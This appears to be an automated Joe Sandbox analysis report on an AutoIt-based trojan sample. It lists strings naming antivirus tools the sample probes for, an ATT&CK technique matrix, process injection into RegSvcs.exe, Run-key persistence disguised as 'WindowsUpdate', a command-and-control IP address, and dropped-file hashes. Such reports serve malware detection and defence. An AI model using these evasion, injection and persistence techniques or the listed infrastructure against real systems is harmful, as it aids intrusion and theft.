          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2368, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt.exe PID: 3732, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: cipkucw.ppt.exe PID: 5780, type: MEMORYSTR
          Source: cipkucw.ppt, 00000006.00000002.1902115604.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1894957701.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1895348993.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000002.2023034016.000000000160F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdagent.exe
          Source: cipkucw.ppt, 00000006.00000002.1902115604.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1894957701.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1895348993.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2022211718.00000000015FA000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021396423.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021523014.00000000015F5000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021288890.000000000158F000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021220494.000000000158B000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000002.2023014076.00000000015FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
          Source: RegSvcs.exe, 0000000C.00000002.4091188698.000000000187C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: cipkucw.ppt.exe, 00000011.00000003.2165739179.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2166399836.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2160554746.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000002.2168766408.0000000000BEB000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2165802750.0000000000BE7000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2167635107.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2165513335.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240621163.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240877457.0000000001704000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240251372.0000000001699000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
          Source: cipkucw.ppt, 00000006.00000002.1902115604.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1894957701.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1895348993.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240621163.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240877457.0000000001704000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240251372.0000000001699000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2242293917.0000000001706000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000002.2243302839.0000000001708000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240734384.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240529759.000000000169A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regshot.exe
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
          Source: cipkucw.ppt.exeBinary or memory string: WIN_81
          Source: cipkucw.ppt.exeBinary or memory string: WIN_XP
          Source: cipkucw.ppt.exe.6.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
          Source: cipkucw.ppt.exeBinary or memory string: WIN_XPe
          Source: cipkucw.ppt.exeBinary or memory string: WIN_VISTA
          Source: cipkucw.ppt.exeBinary or memory string: WIN_7
          Source: cipkucw.ppt.exeBinary or memory string: WIN_8
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00772163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,6_2_00772163
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00771B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,6_2_00771B61
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_01042163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,15_2_01042163
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_01041B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,15_2_01041B61

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information1
          Scripting          		2
          Valid Accounts          		1
          Windows Management Instrumentation          		1
          Scripting          		1
          Exploitation for Privilege Escalation          		11
          Disable or Modify Tools          		21
          Input Capture          		2
          System Time Discovery          		Remote Services1
          Archive Collected Data          		1
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Native API          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          Account Discovery          		Remote Desktop Protocol21
          Input Capture          		1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          Command and Scripting Interpreter          		2
          Valid Accounts          		2
          Valid Accounts          		121
          Obfuscated Files or Information          		Security Account Manager2
          File and Directory Discovery          		SMB/Windows Admin Shares3
          Clipboard Data          		1
          Non-Standard Port          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts1
          Scheduled Task/Job          		1
          Scheduled Task/Job          		21
          Access Token Manipulation          		11
          Software Packing          		NTDS37
          System Information Discovery          		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchd1
          Registry Run Keys / Startup Folder          		312
          Process Injection          		1
          DLL Side-Loading          		LSA Secrets361
          Security Software Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
          Scheduled Task/Job          		11
          Masquerading          		Cached Domain Credentials131
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
          Registry Run Keys / Startup Folder          		2
          Valid Accounts          		DCSync3
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job131
          Virtualization/Sandbox Evasion          		Proc Filesystem11
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
          Access Token Manipulation          		/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron312
          Process Injection          		Network Sniffing1
          System Network Configuration Discovery          		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1582904 Sample: yjOJ1YK5M3.exe Startdate: 31/12/2024 Architecture: WINDOWS Score: 100 69 Suricata IDS alerts for network traffic 2->69 71 Found malware configuration 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 15 other signatures 2->75 9 yjOJ1YK5M3.exe 3 35 2->9         started        13 cipkucw.ppt.exe 1 1 2->13         started        15 cipkucw.ppt.exe 2->15         started        17 cipkucw.ppt.exe 2->17         started        process3 file4 61 C:\Users\user\AppData\Local\...\cipkucw.ppt, PE32 9->61 dropped 63 C:\Users\user\AppData\Local\Temp\...\pgoh.vbe, Unicode 9->63 dropped 91 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->91 19 wscript.exe 1 9->19         started        65 C:\Users\user\AppData\...\cipkucw.ppt.exe.exe, PE32 13->65 dropped 93 Found API chain indicative of sandbox detection 13->93 95 Writes to foreign memory regions 13->95 97 Allocates memory in foreign processes 13->97 22 RegSvcs.exe 3 13->22         started        99 Injects a PE file into a foreign processes 15->99 24 RegSvcs.exe 15->24         started        26 RegSvcs.exe 17->26         started        signatures5 process6 signatures7 81 Windows Scripting host queries suspicious COM object (likely to drop second stage) 19->81 28 cmd.exe 1 19->28         started        30 cmd.exe 1 19->30         started        33 cmd.exe 1 19->33         started        process8 signatures9 35 cipkucw.ppt 1 33 28->35         started        39 conhost.exe 28->39         started        101 Uses ipconfig to lookup or modify the Windows network settings 30->101 41 conhost.exe 30->41         started        43 ipconfig.exe 1 30->43         started        45 conhost.exe 33->45         started        47 ipconfig.exe 1 33->47         started        process10 file11 53 C:\Users\user\AppData\...\cipkucw.ppt.exe, PE32 35->53 dropped 55 C:\Users\user\AppData\Local\...\cipkucw.ppt, PE32 35->55 dropped 57 C:\Users\user\AppData\...\cipkucw.ppt.exe, PE32 35->57 dropped 59 2 other files (1 malicious) 35->59 dropped 83 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 35->83 85 Writes to foreign memory regions 35->85 87 Allocates memory in foreign processes 35->87 89 Injects a PE file into a foreign processes 35->89 49 RegSvcs.exe 3 35->49         started        signatures12 process13 dnsIp14 67 195.26.255.81, 2106, 49737 KCOM-SPNService-ProviderNetworkex-MistralGB United Kingdom 49->67 77 Protects its processes via BreakOnTermination flag 49->77 79 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 49->79 signatures15

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          yjOJ1YK5M3.exe62%ReversingLabsWin32.Trojan.Runner

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt.exe0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\RegSvcs.exe0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe.exe0%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://schemas.microO0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.autoitscript.com/autoit3/JyjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000000.1778450819.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000002.2022650449.0000000001095000.00000002.00000001.01000000.0000000E.sdmp, cipkucw.ppt.exe, 00000011.00000002.2169095460.0000000001095000.00000002.00000001.01000000.0000000E.sdmp, cipkucw.ppt.exe, 00000013.00000000.2151242199.0000000001095000.00000002.00000001.01000000.0000000E.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.drfalse
            		high
            http://schemas.microOcipkucw.ppt.exe, 00000011.00000003.2160334326.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2160509508.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2139352487.0000000000D86000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://www.autoitscript.com/autoit3/yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.drfalse
              		high
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 0000000C.00000002.4092763243.0000000003721000.00000004.00000800.00020000.00000000.sdmpfalse
                		high

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                195.26.255.81
                		unknownUnited Kingdom
                		8897KCOM-SPNService-ProviderNetworkex-MistralGBtrue

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1582904
                Start date and time:2024-12-31 20:25:19 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 11m 32s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:22
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:yjOJ1YK5M3.exe
                renamed because original name is a hash value
                Original Sample Name:7B17EBBF77F53472D2FEBB38E9785026.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@29/61@0/1
                EGA Information:
                • Successful, ratio: 57.1%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 179
                • Number of non-executed functions: 225
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target RegSvcs.exe, PID 2368 because it is empty
                • Execution Graph export aborted for target RegSvcs.exe, PID 6668 because it is empty
                • Execution Graph export aborted for target RegSvcs.exe, PID 6852 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • VT rate limit hit for: yjOJ1YK5M3.exe

                Simulations

                Behavior and APIs

                TimeTypeDescription
                14:26:24API Interceptor1x Sleep call for process: yjOJ1YK5M3.exe modified
                14:27:07API Interceptor7504018x Sleep call for process: RegSvcs.exe modified
                19:26:28AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf
                19:26:41AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf
                19:26:49AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                195.26.255.81QHLQyYBiH7.exeGet hashmaliciousAsyncRATBrowse

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  KCOM-SPNService-ProviderNetworkex-MistralGBu233hvgTow.exeGet hashmaliciousRedLineBrowse
                  • 212.56.41.77
                  Set-up.exeGet hashmaliciousLummaC, GO Backdoor, LummaC StealerBrowse
                  • 195.200.31.22
                  xd.x86.elfGet hashmaliciousMiraiBrowse
                  • 194.164.201.126
                  0Ty.png.exeGet hashmaliciousXmrigBrowse
                  • 194.164.234.171
                  https://a41c415c7bccad129d61b50d2032009e.aktive-senioren.biz/de/st/1?#bqcnl4tocgzq65tck3bvGet hashmaliciousUnknownBrowse
                  • 194.164.200.113
                  ub8ehJSePAfc9FYqZIT6.arm.elfGet hashmaliciousMiraiBrowse
                  • 195.26.252.19
                  ub8ehJSePAfc9FYqZIT6.sh4.elfGet hashmaliciousUnknownBrowse
                  • 195.26.252.19
                  ub8ehJSePAfc9FYqZIT6.ppc.elfGet hashmaliciousUnknownBrowse
                  • 195.26.252.19
                  ub8ehJSePAfc9FYqZIT6.m68k.elfGet hashmaliciousMiraiBrowse
                  • 195.26.252.19
                  ub8ehJSePAfc9FYqZIT6.arm7.elfGet hashmaliciousMiraiBrowse
                  • 195.26.252.19

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptRage.exeGet hashmaliciousUnknownBrowse
                    Rage.exeGet hashmaliciousUnknownBrowse
                      copia111224mp.htaGet hashmaliciousUnknownBrowse
                        FX6KTgnipP.exeGet hashmaliciousFormBookBrowse
                          uhbrQkYNzx.exeGet hashmaliciousFormBookBrowse
                            qPLzfnxGbj.exeGet hashmaliciousFormBookBrowse
                              ngPebbPhbp.exeGet hashmaliciousRHADAMANTHYSBrowse
                                FS04dlvJrq.exeGet hashmaliciousFormBookBrowse
                                  M1Y6kc9FpE.exeGet hashmaliciousFormBookBrowse
                                    mJIvCBk5vF.exeGet hashmaliciousFormBookBrowse

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                      File Type:CSV text
                                      Category:dropped
                                      Size (bytes):425
                                      Entropy (8bit):5.353683843266035
                                      Encrypted:false
                                      SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                      MD5:859802284B12C59DDBB85B0AC64C08F0
                                      SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                      SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                      SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                      C:\Users\user\AppData\Local\Temp\Log.tmp

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):35
                                      Entropy (8bit):3.7071562309216133
                                      Encrypted:false
                                      SSDEEP:3:rRSFYJKXzovNsr4rn:EFYJKDoWrcn
                                      MD5:BFABEC865892A34F532FABF984F7E156
                                      SHA1:3C8292E49FEFD3DA96DBC289B36C4C710B0127E3
                                      SHA-256:8C8E36E0088165B6606F75DF86D53D3527FD36518C5AAB07425969B066FEEEC6
                                      SHA-512:CA042E157B8C0E728991567016DF2036D8E6E4311CC74E7DB8AB6335AC20C02BD8099F3248E82B8DB5C26A7C6B687D1D7A440EC77D55B3BAE42D3753DBD63129
                                      Malicious:false
                                      Preview:....### explorer ###..[WIN]r[WIN]r

                                      C:\Users\user\AppData\Local\Temp\RarSFX0\axha.icm

                                      Download File
                                      Process:C:\Users\user\Desktop\yjOJ1YK5M3.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):537
                                      Entropy (8bit):5.605243272883823
                                      Encrypted:false
                                      SSDEEP:12:FjfgTkvCgqvvhYuZaSsOGKrCTMYWHKGg5erBP1j9RviwdxQAFPL:FjmkvCgqxYuZkYCIYU0erplDdxH
                                      MD5:F982A60E5F1B14C79FC141B895CC766C
                                      SHA1:2ECC98EA11167D0692D64FEB812E1E648503EA4A
                                      SHA-256:E019E67A0F7EC0696FEBB0DC7C6BCC727AAE6079AC6AD3FA23E7BF8A099214AA
                                      SHA-512:9E1CD62BA25C58E71D7639451C61EE9552EABA25E1E2E969ECC1E3C21DF1D339B939B2E1952142D2EB1A2969D494272FC8C391F01F9438B770CD227ADC4FFE96
                                      Malicious:false
                                      Preview:Sia21q25..ToolbarConstants BorderConstants..98xRq36y95DaGzM1R0H259..UpDownConstants FontConstants..rA024c9ph4V27w6hVjcX7912W9CkI92S37nZveKVW85fRN3A20Oaz79WTa46478128ThL65z8d6VuQnQ7y4I131B7768UWwm15Z6CwIk8174Hl54V9oG2a1K23V3v1N50t4FRC1301Jmg1g0d1695ZL29uL6gxbsV89TIR6181SZOD..BorderConstants ToolTipConstants..pb035oc34YhgKP947PsExG664m5t27X225wN0140es87e54rsE884Wvz5zj3OjVan67gUx6..StructureConstants TreeViewConstants..4Uz182p4p9QT986y4V7B8vZ1ixymR57JOv0m0c7QJuwORt79oC7T2F65NGv3qbbDLOLpl4sx8NT5438v..TreeViewConstants ButtonConstants..

                                      C:\Users\user\AppData\Local\Temp\RarSFX0\bbgsq.mp3

                                      Download File
                                      Process:C:\Users\user\Desktop\yjOJ1YK5M3.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):544
                                      Entropy (8bit):5.632129400085251
                                      Encrypted:false
                                      SSDEEP:12:ZtFHc2i5d6R9c9Kn9NhSnrFWNVRF8MNQZPsEXEF4+f9CVxfh:ZtF82i5d6/Zn9N8ned6W+LuCzh
                                      MD5:6067AC7E038C2BFDFB972A778A59B502
                                      SHA1:6E271F05DBC646815F80E066278533E679D7E623
                                      SHA-256:6059FF208EB32CA458348D8090BB816F44DF314A45FA150505EAA1CDE10C64C9
                                      SHA-512:C38F9045FB97784546E8C0530C265DB7090C0C48F68A38707294258C15C9D08567B08255D16AA715215F6A4B1F90F4F2932BB022F50E74CD9371213CCCE1ECCB
                                      Malicious:false
                                      Preview:1w550f88yNMY305CLkv3T0cKo6ME19fL231JW3dZ81tG54a2eIsJ28X6p91Pcq85Sgbz1t507afppX0Bi6nR190GN0w7R6x8..BorderConstants GuiDateTimePicker..L37x74094AirySff72Zd7I4y9vOz2Rq71a0mr34w0rFabvn70OUg358TF52hO779xOZAmPBx247C03S4N2HW1blLF49R97WNn4s939P85B23cvK7C13Y86mYI6RX..FileConstants ColorConstants..d4sM7n5Wm599751RQCeVdt44P18md7iKRd3737uY4N18r8B540IH29e0T1A206DO0c1s65X9XOF625uZ6e7G0..TreeViewConstants ComboConstants..r3RX34B6512JJD3b1pp6z6218Y1U2uJ717uQ4cpf8834J6SRf0kr742c98y8019q163u32Cy9590H73Y6Ai9H8t7tJ59QV38e5..StructureConstants FileConstants..

                                      C:\Users\user\AppData\Local\Temp\RarSFX0\bocmvwxai.mp3

                                      Download File
                                      Process:C:\Users\user\Desktop\yjOJ1YK5M3.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):535
                                      Entropy (8bit):5.538141917200933
                                      Encrypted:false
                                      SSDEEP:12:KTqHYhQZu5KfFu/YCMuZH5OvJ/QZ35sxtbw343gn6FUJ:KlhcuUYlZH5Oi5sDbTY6FUJ
                                      MD5:AF67F6BBD092665560CCA8A81115F98E
                                      SHA1:3E182E87A2FEC52365F75827FB97E3EFADEAE0EC
                                      SHA-256:B18EE92E84E90F07567CEF8A354D820D3A8F973AFDD973D8630804C6F731E991
                                      SHA-512:0A0CE38A8F7E2944C460B4A16B2221A85E1E55ECD86DBFD97B4C60505AAEB2D1EC2AE9C2C50574C082FE742368EE9BDDB554AD57E7B2BB28542B78AB04FD7799
                                      Malicious:false
